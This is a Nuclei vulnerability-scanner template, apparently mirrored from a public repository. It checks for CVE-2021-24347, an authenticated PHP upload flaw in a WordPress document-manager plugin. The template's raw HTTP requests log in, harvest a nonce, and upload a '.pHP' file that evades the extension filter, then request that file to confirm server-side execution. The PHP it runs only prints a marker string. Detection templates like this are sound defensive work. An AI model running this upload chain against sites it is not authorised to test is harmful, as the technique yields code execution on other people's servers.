daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2021/CVE-2021-24347.yaml

99 lines
3.3 KiB
YAML
Raw Normal View History

templates added
2023-03-05 13:42:10 +00:00
id: CVE-2021-24347
info:
name: SP Project & Document Manager < 4.22 - Authenticated Shell Upload
author: theamanrawat
severity: high
description: |
The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".
reference:
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
- https://wordpress.org/plugins/sp-client-document-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
Auto Generated CVE annotations [Sun Mar 5 14:19:20 UTC 2023] :robot:
2023-03-05 14:19:20 +00:00
remediation: Fixed in version 4.22
templates added
2023-03-05 13:42:10 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Auto Generated CVE annotations [Sun Mar 5 14:19:20 UTC 2023] :robot:
2023-03-05 14:19:20 +00:00
cvss-score: 8.8
templates added
2023-03-05 13:42:10 +00:00
cve-id: CVE-2021-24347
Auto Generated CVE annotations [Sun Mar 5 14:19:20 UTC 2023] :robot:
2023-03-05 14:19:20 +00:00
cwe-id: CWE-178
templates added
2023-03-05 13:42:10 +00:00
metadata:
verified: "true"
Auto Generated CVE annotations [Sun Mar 5 14:19:20 UTC 2023] :robot:
2023-03-05 14:19:20 +00:00
tags: wp-plugin,wp,sp-client-document-manager,authenticated,wordpress,cve2021,rce,wpscan,cve
templates added
2023-03-05 13:42:10 +00:00
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="cdm_upload_file_field"
{{nonce}}
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml
<?php
echo "CVE-2021-24347";
?>
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(all_headers_4, "text/html")
- status_code_4 == 200
- contains(body_4, "CVE-2021-24347")
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"'
internal: true